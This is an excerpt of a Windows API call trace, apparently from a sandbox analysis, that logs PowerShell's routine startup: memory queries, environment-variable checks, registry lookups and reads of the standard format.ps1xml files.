0x30 [0062.033] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.033] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.034] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.034] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.034] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.036] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.039] VirtualQuery (in: lpAddress=0x24c220, lpBuffer=0x24d0e0, dwLength=0x30 | out: lpBuffer=0x24d0e0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.039] VirtualQuery (in: lpAddress=0x24c220, lpBuffer=0x24d0e0, dwLength=0x30 | out: lpBuffer=0x24d0e0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.039] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.040] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.141] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.142] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.143] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.159] CoTaskMemAlloc (cb=0x104) returned 0x1b96d2f0 [0062.159] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.159] CoTaskMemFree (pv=0x1b96d2f0) [0062.167] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.173] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.173] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.174] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.174] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.175] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.175] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.176] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.178] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x24d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0062.179] SetErrorMode (uMode=0x1) returned 0x1 [0062.180] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x24d5a0 | out: lpFileInformation=0x24d5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0062.180] SetErrorMode (uMode=0x1) returned 0x1 [0062.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0062.180] SetErrorMode (uMode=0x1) returned 0x1 [0062.180] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d5a0 | out: lpFileInformation=0x24d5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0062.185] SetErrorMode (uMode=0x1) returned 0x1 [0062.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0062.185] SetErrorMode (uMode=0x1) returned 0x1 [0062.185] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d5a0 | out: lpFileInformation=0x24d5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0062.186] SetErrorMode (uMode=0x1) returned 0x1 [0062.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0062.186] SetErrorMode (uMode=0x1) returned 0x1 [0062.186] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d5a0 | out: lpFileInformation=0x24d5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0062.187] SetErrorMode (uMode=0x1) returned 0x1 [0062.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0062.188] SetErrorMode (uMode=0x1) returned 0x1 [0062.188] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d5a0 | out: lpFileInformation=0x24d5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0062.188] SetErrorMode (uMode=0x1) returned 0x1 [0062.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0062.188] SetErrorMode (uMode=0x1) returned 0x1 [0062.188] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d5a0 | out: lpFileInformation=0x24d5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0062.189] SetErrorMode (uMode=0x1) returned 0x1 [0062.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0062.189] SetErrorMode (uMode=0x1) returned 0x1 [0062.190] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d5a0 | out: lpFileInformation=0x24d5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0062.190] SetErrorMode (uMode=0x1) returned 0x1 [0062.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0062.190] SetErrorMode (uMode=0x1) returned 0x1 [0062.190] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d5a0 | out: lpFileInformation=0x24d5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0062.190] SetErrorMode (uMode=0x1) returned 0x1 [0062.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0062.191] SetErrorMode (uMode=0x1) returned 0x1 [0062.191] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d5a0 | out: lpFileInformation=0x24d5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0062.191] SetErrorMode (uMode=0x1) returned 0x1 [0062.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0062.191] SetErrorMode (uMode=0x1) returned 0x1 [0062.191] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d5a0 | out: lpFileInformation=0x24d5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0062.191] SetErrorMode (uMode=0x1) returned 0x1 [0062.193] CoTaskMemAlloc (cb=0x104) returned 0x1b96d2f0 [0062.193] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.193] CoTaskMemFree (pv=0x1b96d2f0) [0062.213] CoTaskMemAlloc (cb=0x104) returned 0x1b96d2f0 [0062.214] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.214] CoTaskMemFree (pv=0x1b96d2f0) [0062.215] CoTaskMemAlloc (cb=0x104) returned 0x1b96d2f0 [0062.215] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.215] CoTaskMemFree (pv=0x1b96d2f0) [0062.216] CoTaskMemAlloc (cb=0x104) returned 0x1b96d2f0 [0062.216] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.217] CoTaskMemFree (pv=0x1b96d2f0) [0062.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0062.217] SetErrorMode (uMode=0x1) returned 0x1 [0062.217] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308 [0062.218] GetFileType (hFile=0x308) returned 0x1 [0062.218] SetErrorMode (uMode=0x1) returned 0x1 [0062.218] GetFileType (hFile=0x308) returned 0x1 [0062.218] ReadFile (in: hFile=0x308, lpBuffer=0x34ba980, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x34ba980*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.238] ReadFile (in: hFile=0x308, lpBuffer=0x34ba980, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x34ba980*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.238] ReadFile (in: hFile=0x308, lpBuffer=0x34ba980, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x34ba980*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.238] ReadFile (in: hFile=0x308, lpBuffer=0x34ba980, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x34ba980*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.239] ReadFile (in: hFile=0x308, lpBuffer=0x34ba980, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x34ba980*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.239] ReadFile (in: hFile=0x308, lpBuffer=0x34ba980, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x34ba980*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.239] ReadFile (in: hFile=0x308, lpBuffer=0x34ba980, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x34ba980*, lpNumberOfBytesRead=0x24d238*=0x9e2, lpOverlapped=0x0) returned 1 [0062.239] ReadFile (in: hFile=0x308, lpBuffer=0x34b9eca, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x34b9eca*, lpNumberOfBytesRead=0x24d238*=0x0, lpOverlapped=0x0) returned 1 [0062.239] ReadFile (in: hFile=0x308, lpBuffer=0x34ba980, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x34ba980*, lpNumberOfBytesRead=0x24d238*=0x0, lpOverlapped=0x0) returned 1 [0062.240] CloseHandle (hObject=0x308) returned 1 [0062.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0062.240] SetErrorMode (uMode=0x1) returned 0x1 [0062.240] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d1e0 | out: lpFileInformation=0x24d1e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0062.240] SetErrorMode (uMode=0x1) returned 0x1 [0062.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0062.240] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2c8 | out: phkResult=0x24d2c8*=0x308) returned 0x0 [0062.241] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d24c, lpData=0x0, lpcbData=0x24d248*=0x0 | out: lpType=0x24d24c*=0x1, lpData=0x0, lpcbData=0x24d248*=0x56) returned 0x0 [0062.241] CoTaskMemAlloc (cb=0x5a) returned 0x156fa0 [0062.241] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d21c, lpData=0x156fa0, lpcbData=0x24d218*=0x56 | out: lpType=0x24d21c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d218*=0x56) returned 0x0 [0062.241] CoTaskMemFree (pv=0x156fa0) [0062.241] RegCloseKey (hKey=0x308) returned 0x0 [0062.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0062.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0062.284] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x4588558d, Data2=0xb1e7, Data3=0x4882, Data4=([0]=0x8c, [1]=0xc6, [2]=0xd9, [3]=0xac, [4]=0x10, [5]=0xf5, [6]=0x8e, [7]=0x5))) returned 0x0 [0062.298] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x34dee91b, Data2=0xc6f7, Data3=0x4c9f, Data4=([0]=0x9b, [1]=0x3b, [2]=0xb4, [3]=0xd7, [4]=0x75, [5]=0x45, [6]=0x81, [7]=0x75))) returned 0x0 [0062.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0062.301] SetErrorMode (uMode=0x1) returned 0x1 [0062.301] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308 [0062.301] GetFileType (hFile=0x308) returned 0x1 [0062.301] SetErrorMode (uMode=0x1) returned 0x1 [0062.301] GetFileType (hFile=0x308) returned 0x1 [0062.301] ReadFile (in: hFile=0x308, lpBuffer=0x34e54e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x34e54e8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 